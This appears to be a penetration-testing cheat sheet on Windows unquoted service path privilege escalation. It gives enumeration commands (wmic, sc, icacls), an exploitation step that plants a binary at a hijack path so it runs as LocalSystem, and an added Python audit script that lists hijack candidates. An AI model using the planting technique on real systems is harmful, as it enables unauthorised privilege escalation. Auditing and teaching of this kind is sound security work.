>_ shadow.red

Unquoted Service Paths

Tags: Privilege Escalation, Windows Services, windows

Identify vulnerable services

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

If a service's path contains spaces and is not quoted, e.g. C:\Program Files\My Program\service.exe, Windows (CreateProcess) cannot tell where the executable ends and its arguments begin, so it tries each space-delimited prefix in order, appending .exe where the prefix has no extension:

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\service.exe

The first file that exists is started with the service's privileges (usually LocalSystem).

Check binary permissions

icacls "C:\Program Files (x86)\UNQUOTED_SERVICE_PATH_SOFTWARE"

Look for write, modify or full rights ((W), (M), (F)) granted to non-administrative principals such as Everyone, BUILTIN\Users or Authenticated Users on any parent directory along the path (here C:\ and C:\Program Files (x86)), since a hijack requires creating a file at one of the locations listed above.

Exploitation

If a vulnerable parent directory is writable, plant your binary at the hijack location:

move sirenMaint.exe "C:\Program Files\something\Program.exe"

Bulk enumeration with cacls

cd C:\Windows\TEMP
sc query state= all | findstr "SERVICE_NAME:" >> ServiceNames.txt
FOR /F "tokens=2 delims= " %i in (ServiceNames.txt) DO @echo %i >> Services.txt
FOR /F %i in (Services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
type path.txt
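As an added audit-side example (not part of the shadow.red page), the following Python reproduces the search order above for a set of service records and lists, per unquoted path, the files Windows would try first and the directories whose ACLs decide whether that matters. The records are constructed; on a real host they would come from the wmic query above (e.g. with /format:csv) or from the sc qc output collected in path.txt.

```python
import ntpath
from collections import namedtuple

# hijack_candidates: files tried before the real binary; dirs_to_check: run icacls on these
Finding = namedtuple("Finding", "service path start_mode hijack_candidates dirs_to_check")

def executable_candidates(pathname: str) -> list:
    """Files CreateProcess tries for an unquoted path, in order: each space-delimited
    prefix, with ".exe" appended when the prefix has no extension, up to and including
    the first prefix that already ends in .exe (the intended binary; the rest is args)."""
    tokens = pathname.split(" ")
    out = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            out.append(prefix)
            break
        out.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    return out

def scan(records) -> list:
    """records: (Name, PathName, StartMode) tuples as reported by wmic. Like the wmic
    filter above, quoted paths and binaries under C:\\Windows\\ are skipped."""
    findings = []
    for name, pathname, start_mode in records:
        p = pathname.strip()
        if p.startswith('"') or p.lower().startswith("c:\\windows\\"):
            continue
        cands = executable_candidates(p)
        if len(cands) < 2:
            continue  # no spaces in the executable part of the path
        dirs = []
        for c in cands[:-1]:
            d = ntpath.dirname(c)
            if d not in dirs:
                dirs.append(d)
        findings.append(Finding(name, p, start_mode, cands[:-1], dirs))
    return findings

# Constructed sample records, not real services on any host.
SAMPLE_SERVICES = [
    ("GoodSvc", '"C:\\Program Files\\Good Vendor\\good.exe"', "Auto"),
    ("BadSvc", "C:\\Program Files\\My Program\\service.exe", "Auto"),
    ("ArgsSvc", "C:\\Tools\\Agent Tools\\agent.exe -k netsvc", "Manual"),
    ("SysSvc", "C:\\Windows\\System32\\svchost.exe -k netsvcs", "Auto"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_SERVICES):
        print(f.service, f.path, "| tried first:", f.hijack_candidates, "| check:", f.dirs_to_check)
```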